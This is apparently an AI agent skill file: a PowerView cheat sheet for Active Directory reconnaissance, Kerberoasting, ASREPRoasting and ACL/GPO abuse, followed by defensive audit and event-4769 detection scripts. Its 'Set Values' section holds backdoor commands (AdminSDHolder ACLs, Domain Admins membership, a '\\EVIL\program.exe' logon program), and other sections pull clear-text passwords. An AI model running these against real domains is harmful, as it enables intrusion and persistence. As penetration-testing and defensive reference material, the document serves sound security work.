# Hacktricks-skills ad-enumeration-powerview
Active Directory enumeration using PowerView/SharpView. Use this skill whenever the user mentions Active Directory enumeration, AD reconnaissance, PowerView, SharpView, domain security assessment, AD pentesting, finding misconfigurations in AD, Kerberoast, ASREPRoast, or any AD-related security testing. Make sure to use this skill for any AD enumeration task, even if the user doesn't explicitly mention PowerView.
```bash
git clone https://github.com/abelrguezr/hacktricks-skills
```

Path: skills/windows-hardening/basic-powershell-for-pentesters/powerview/SKILL.MD

# Active Directory Enumeration with PowerView/SharpView
A comprehensive guide for enumerating Active Directory environments using PowerView and SharpView tools.
## Quick Reference

### Domain Information

```powershell
Get-NetDomain          # Basic domain info
Get-DomainSID          # Get domain SID
Get-DomainController   # Domain controller details
Get-ForestDomain       # All domains in forest
Get-DomainPolicy       # Domain policy info
```

### User Enumeration

```powershell
Get-NetUser                                 # List all users
Get-NetUser -PreauthNotRequired             # ASREPRoastable users
Get-NetUser -SPN                            # Kerberoastable users
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE   # Enabled users
Get-NetUser -LDAPFilter '(sidHistory=*)'    # Users with sidHistory
```

### Group Enumeration

```powershell
Get-NetGroup                                            # List all groups
Get-NetGroup -AdminCount                                # Admin groups
Get-NetGroupMember -Identity "Domain Admins" -Recurse   # Group members
```

### Computer Enumeration

```powershell
Get-NetComputer                  # List all computers
Get-NetComputer -Unconstrained   # Unconstrained delegation
Get-NetComputer -TrustedToAuth   # Constrained delegation
```

### ACL Analysis

```powershell
Get-ObjectAcl -SamAccountName <user> -ResolveGUIDs   # Object ACLs
Find-InterestingDomainAcl -ResolveGUIDs              # Interesting ACEs
```

### GPO Analysis

```powershell
Get-DomainGPO                                                   # List all GPOs
Get-DomainGPOLocalGroup                                         # GPO local group mappings
Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators   # Who's in local admins
```

### Low-Hanging Fruit

```powershell
Find-LocalAdminAccess     # Find local admin access
Invoke-UserHunter         # Find user locations
Find-DomainUserLocation   # User location finder
Invoke-Kerberoast         # Kerberoast attack
```
## Detailed Enumeration

### Domain Information

```powershell
# Domain Info
Get-Domain                             # Get info about the current domain
Get-NetDomain                          # Get info about the current domain
Get-NetDomain -Domain mydomain.local   # Specific domain
Get-DomainSID                          # Get domain SID

# Policy
Get-DomainPolicy                       # Get info about the policy
(Get-DomainPolicy)."KerberosPolicy"    # Kerberos tickets info
(Get-DomainPolicy)."SystemAccess"      # Password policy
Get-DomainPolicyData                   # Same as Get-DomainPolicy

# Domain Controller
Get-DomainController | select Forest, Domain, IPAddress, Name, OSVersion | fl
Get-NetDomainController -Domain mydomain.local

# Forest Info
Get-ForestDomain                       # Get all domains in forest
Get-ForestGlobalCatalog                # Get forest global catalog info
```
### Users

```powershell
# Basic User Info
Get-DomainUser -Properties name, MemberOf | fl
Get-NetUser | select samaccountname, description, pwdlastset, logoncount, badpwdcount
Get-NetUser -UserName student107            # Specific user
Get-NetUser -properties name, description   # Specific properties

# Search Users
Find-UserField -SearchField Description -SearchTerm "built"   # Search in fields

# Security-Relevant Users
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'}   # Reversible encryption
Get-NetUser -PreauthNotRequired                             # ASREPRoastable users
Get-NetUser -SPN | select serviceprincipalname              # Kerberoastable users
Get-NetUser -SPN | ?{$_.memberof -match 'Domain Admins'}    # Domain admins kerberoastable
Get-NetUser -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto   # Constrained delegation
Get-NetUser -AllowDelegation -AdminCount                    # Privileged users allowing delegation

# DC Sync Capable Users
Get-ObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? { ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') }

# Password Not Required
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

# User Filters
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE -properties distinguishedname    # All enabled users
Get-NetUser -UACFilter ACCOUNTDISABLE                                      # All disabled users
Get-NetUser -UACFilter SMARTCARD_REQUIRED                                  # Smart card required
Get-NetUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname   # Not smart card
Get-NetUser -LDAPFilter '(sidHistory=*)'                                   # Users with sidHistory
```
### Groups

```powershell
# Basic Group Info
Get-DomainGroup | where Name -like "*Admin*" | select SamAccountName
Get-NetGroup                                                            # Get all groups
Get-NetGroup -Domain mydomain.local                                     # Specific domain
Get-NetGroup 'Domain Admins'                                            # Specific group
Get-NetGroup -AdminCount | select name,memberof,admincount,member | fl   # Admin groups
Get-NetGroup -UserName "myusername"                                     # Groups of a user

# Group Members
Get-NetGroupMember -Identity "Administrators" -Recurse          # Recursive members
Get-NetGroupMember -Identity "Enterprise Admins" -Domain mydomain.local
Get-NetLocalGroup -ComputerName dc.mydomain.local -ListGroups   # Local groups
Get-NetLocalGroupMember -computername dcorp-dc.dollarcorp.moneycorp.local

# AdminSDHolder
Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs
$sid = Convert-NameToSid <username/group>   # SID of the principal whose ACEs you want to find
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}

# GPO Groups
Get-NetGPOGroup   # Get restricted groups
```
### Computers

```powershell
# Basic Computer Info
Get-DomainComputer -Properties DnsHostName   # All domain computers
Get-NetComputer                              # All computer objects
Get-NetComputer -Ping                        # Ping to check if online

# Delegation
Get-NetComputer -Unconstrained               # Unconstrained delegation
Get-NetComputer -TrustedToAuth               # Constrained delegation

# Privileged Machine Accounts
Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'}
```
### Organization Units

```powershell
Get-DomainOU -Properties Name | sort -Property Name   # All OUs
Get-DomainOU "Servers" | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties Name}
Get-NetOU                                             # Get Organization Units
Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_}
```
### Logon and Sessions

```powershell
Get-NetLoggedon -ComputerName <servername>     # Current logon users (needs admin)
Get-NetSession -ComputerName <servername>      # Active sessions
Get-LoggedOnLocal -ComputerName <servername>   # Local logon users (needs remote registry)
Get-LastLoggedOn -ComputerName <servername>    # Last logged on user (needs admin)
Get-NetRDPSession -ComputerName <servername>   # RDP sessions (needs admin)
```
### Group Policy Objects (GPOs)

```powershell
# Basic GPO Info
Get-DomainGPO | select displayName      # GPO names
Get-NetGPO                              # All policies with details
Get-NetGPO -ComputerName <servername>   # Policy on specific computer

# GPO Permissions
Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=dev,DC=invented,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl

# Users with GPO modification rights (RID > 1000)
Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner') } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl

# User/Group GPO permissions
$sid=Convert-NameToSid "Domain Users"
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}

# GPO Utilities
Get-GPO -Guid 18E5A689-E67F-90B2-1953-198ED4A7F532               # GUID to name
ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1126   # SID to name
Get-NetGPO -GPOName '{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}'     # GPO by GUID

# Local Group Mappings
Get-DomainGPOLocalGroup | select GPODisplayName, GroupName, GPOType
Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName
```
### ACL Analysis

```powershell
# Object ACLs
Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs

# Alternative ACL method
$sid = Convert-NameToSid <username/group>
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}

# File ACLs
Get-PathAcl -Path "\\dc.mydomain.local\sysvol"

# Interesting ACEs
Find-InterestingDomainAcl -ResolveGUIDs   # Unexpected permissions
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUsers"}

# Administrator ACLs
Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "false"} | %{Get-ObjectACL -SamAccountName $_.MemberName -ResolveGUIDs} | select ObjectDN, IdentityReference, ActiveDirectoryRights
```
### Shared Files and Folders

```powershell
Get-NetFileServer                    # Search file servers
Find-DomainShare -CheckShareAccess   # Search readable shares
Find-InterestingDomainShareFile      # Find interesting files
```
### Domain Trusts

```powershell
Get-NetDomainTrust                          # All domain trusts
Get-DomainTrust                             # Same
Get-NetForestDomain | Get-NetDomainTrust    # All trusts in forest
Get-DomainTrustMapping                      # Enumerate trusts

# Forest Info
Get-ForestDomain                                  # Basic forest info
Get-ForestGlobalCatalog                           # Current forest
Get-ForestGlobalCatalog -Forest external.domain   # External forest
Get-DomainTrust -SearchBase "GC://$($ENV:USERDNSDOMAIN)"

# Forest Trusts
Get-NetForestTrust                          # Forest trusts (root to root)

# Foreign Objects
Get-DomainForeignUser                       # Users with privileges in other domains
Get-DomainForeignGroupMember                # Groups with privileges in other domains
```
### Low-Hanging Fruit

```powershell
# Clear Text Passwords
$FormatEnumerationLimit=-1
Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl

# Local Admin Access
Find-LocalAdminAccess   # Very noisy, needs RPC and SMB

# WMI Local Admin Access
.\Find-WMILocalAdminAccess.ps1 -ComputerFile .\computers.txt   # If RPC/SMB closed

# GPO Local Admin Mapping
Get-DomainGPOUserLocalGroupMapping -Identity <User/Group>

# Local Admin Enumeration
Invoke-EnumerateLocalAdmin   # Enumerate local admin members
Find-DomainLocalGroupMember

# Unconstrained Delegation
Find-DomainUserLocation -ComputerUnconstrained -ShowAll
Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation

# User Hunter
Find-DomainUserLocation [-CheckAccess] | select UserName, SessionFromName
Invoke-UserHunter [-CheckAccess]          # Find user locations
Invoke-UserHunter -GroupName "RDPUsers"   # Specific group
Invoke-UserHunter -Stealth                # High traffic servers only
```
### Deleted Objects

```powershell
# Requires AD Recycle Bin group membership
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
```
## Utilities

### SID to Name

```powershell
"S-1-5-21-1874506631-3219952063-538504511-2136" | Convert-SidToName
```
### Kerberoast

```powershell
Invoke-Kerberoast [-Identity websvc]   # Without -Identity, kerberoast all possible users
```
### Use Different Credentials

```powershell
$SecPassword = ConvertTo-SecureString 'Password' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\user', $SecPassword)
Get-DomainUser -Credential $Cred
```
### Impersonate a User

```powershell
# Requires -sta mode
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Invoke-UserImpersonation -Credential $Cred
# ... perform actions ...
Invoke-RevertToSelf
```
### Set Values

```powershell
# Set user property
Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose

# Set object owner
Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y

# Backdoor ACLs through AdminSDHolder
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All

# Add user to group
Add-NetGroupUser -Username username -GroupName 'Domain Admins' -Domain my.domain.local
```
## Common Attack Vectors

### ASREPRoast

Users with pre-authentication not required can have their passwords cracked offline.

```powershell
Get-NetUser -PreauthNotRequired
```

### Kerberoast

Users with SPNs can have their TGS tickets requested and cracked.

```powershell
Get-NetUser -SPN
Invoke-Kerberoast
```

### Unconstrained Delegation

Computers with unconstrained delegation can capture admin credentials.

```powershell
Get-NetComputer -Unconstrained
Find-DomainUserLocation -ComputerUnconstrained -ShowAll
```

### ACL Abuse

Interesting ACLs can lead to privilege escalation.

```powershell
Find-InterestingDomainAcl -ResolveGUIDs
```

### GPO Abuse

GPO permissions can be abused for persistence and privilege escalation.

```powershell
Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators
```
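The three Kerberos-related vectors above (ASREPRoast, Kerberoast, unconstrained delegation) are misconfigurations an AD owner can audit and fix from the blue side. The following audit script is an added example, not part of the original skill or of PowerView; it uses the RSAT `ActiveDirectory` module (assumed installed), and the `-Remediate` switch, the function name and the 516 (Domain Controllers) primary-group check are this example's own choices.

```powershell
# Added audit example, not part of the original cheat sheet. Uses the RSAT
# ActiveDirectory module (assumed installed) instead of PowerView; the caller
# needs read access to user/computer objects and write access for -Remediate.
Import-Module ActiveDirectory

function Get-KerberosExposureReport {
    [CmdletBinding()]
    param(
        [switch]$Remediate   # also turn pre-authentication back on for ASREPRoastable accounts
    )
    $findings = [System.Collections.Generic.List[object]]::new()

    # ASREPRoast: DONT_REQ_PREAUTH lets anyone obtain crackable AS-REP material for the account.
    Get-ADUser -Filter { DoesNotRequirePreAuth -eq $true } -Properties DoesNotRequirePreAuth | ForEach-Object {
        $findings.Add([pscustomobject]@{ Issue = 'ASREPRoast'; Object = $_.SamAccountName
                                         Fix = 'Set-ADAccountControl -DoesNotRequirePreAuth $false' })
        if ($Remediate) { Set-ADAccountControl -Identity $_ -DoesNotRequirePreAuth $false }
    }

    # Kerberoast: any domain user can request a TGS for a user-held SPN; the ticket is encrypted
    # with the account's password hash, so weak or old passwords are the real exposure.
    Get-ADUser -Filter { ServicePrincipalName -like '*' } -Properties ServicePrincipalName, PasswordLastSet, AdminCount |
        Where-Object { $_.SamAccountName -ne 'krbtgt' } | ForEach-Object {
            $age = if ($_.PasswordLastSet) { "$(((Get-Date) - $_.PasswordLastSet).Days) days" } else { 'never set' }
            $findings.Add([pscustomobject]@{
                Issue  = if ($_.AdminCount -eq 1) { 'Kerberoast (privileged)' } else { 'Kerberoast' }
                Object = $_.SamAccountName
                Fix    = "Rotate to a long random password (password age: $age) or migrate to a gMSA"
            })
        }

    # Unconstrained delegation: the host caches every authenticating user's TGT. Domain
    # controllers (primary group RID 516) are expected to have it; anything else is a finding.
    Get-ADComputer -Filter { TrustedForDelegation -eq $true } -Properties TrustedForDelegation, PrimaryGroupID |
        Where-Object { $_.PrimaryGroupID -ne 516 } | ForEach-Object {
            $findings.Add([pscustomobject]@{ Issue = 'Unconstrained delegation'; Object = $_.DNSHostName
                Fix = 'Use (resource-based) constrained delegation; mark privileged accounts "sensitive and cannot be delegated"' })
        }

    return $findings
}

Get-KerberosExposureReport | Format-Table -AutoSize -Wrap
```

Run it read-only first; `-Remediate` only flips pre-authentication back on, because SPN password rotation and delegation changes need coordination with the service owners.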
## Safety Notes

- Authorization Required: Only use these tools on systems you own or have explicit permission to test.
- Noisy Operations: Commands like `Find-LocalAdminAccess` are very noisy and will trigger alerts.
- Privilege Requirements: Many commands require domain user or admin privileges.
- Legal Compliance: Ensure compliance with all applicable laws and regulations.
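What "very noisy" looks like from the domain controller: `Find-LocalAdminAccess` makes one Kerberos-authenticated SMB connection per computer, so the KDC logs a burst of event 4769 service-ticket requests from one account for many different `HOST$` services, and `Invoke-Kerberoast` produces 4769 events with RC4 encryption (0x17) for user-held SPNs. The detector below is an added example, not part of the original skill; it assumes it runs on a DC with the "Audit Kerberos Service Ticket Operations" subcategory enabled, and the function name, window and thresholds are placeholders to tune for your environment.

```powershell
# Added detection example, not part of the original cheat sheet. Run on a domain
# controller; requires event 4769 auditing. Thresholds are assumed starting values.
function Find-ServiceTicketBursts {
    param(
        [int]$Minutes = 10,                # lookback window in the Security log
        [int]$DistinctSpnThreshold = 15,   # one account hitting this many services = host sweep
        [int]$Rc4Threshold = 5             # RC4 tickets for user SPNs = kerberoast signature
    )
    $since  = (Get-Date).AddMinutes(-$Minutes)
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4769; StartTime = $since } -ErrorAction SilentlyContinue

    # Flatten each event's EventData into a row, looking fields up by name rather than index.
    $rows = foreach ($e in $events) {
        $d = @{}
        ([xml]$e.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
        [pscustomobject]@{
            Account = $d['TargetUserName']          # requesting account (user@REALM)
            Service = $d['ServiceName']             # service account: HOST$ for machines, sAMAccountName for user SPNs
            Etype   = $d['TicketEncryptionType']    # 0x17 = RC4-HMAC, the crackable ticket type
            Source  = $d['IpAddress']
            Time    = $e.TimeCreated
        }
    }

    # Score each requesting account over the window.
    foreach ($g in ($rows | Group-Object Account)) {
        $distinct = ($g.Group.Service | Sort-Object -Unique).Count
        $rc4      = ($g.Group | Where-Object { $_.Etype -eq '0x17' -and $_.Service -notlike '*$' }).Count
        if ($distinct -ge $DistinctSpnThreshold -or $rc4 -ge $Rc4Threshold) {
            [pscustomobject]@{
                Account           = $g.Name
                DistinctServices  = $distinct
                Rc4UserSpnTickets = $rc4
                Sources           = ($g.Group.Source | Sort-Object -Unique) -join ','
                FirstSeen         = ($g.Group.Time | Measure-Object -Minimum).Minimum
                Verdict           = if ($rc4 -ge $Rc4Threshold) { 'Possible Kerberoast' } else { 'Possible host sweep (e.g. Find-LocalAdminAccess)' }
            }
        }
    }
}

Find-ServiceTicketBursts | Format-Table -AutoSize -Wrap
```

Legitimate scanners and monitoring accounts will also trip the distinct-service rule, so baseline them and whitelist by `Account` and `Sources` rather than raising the threshold.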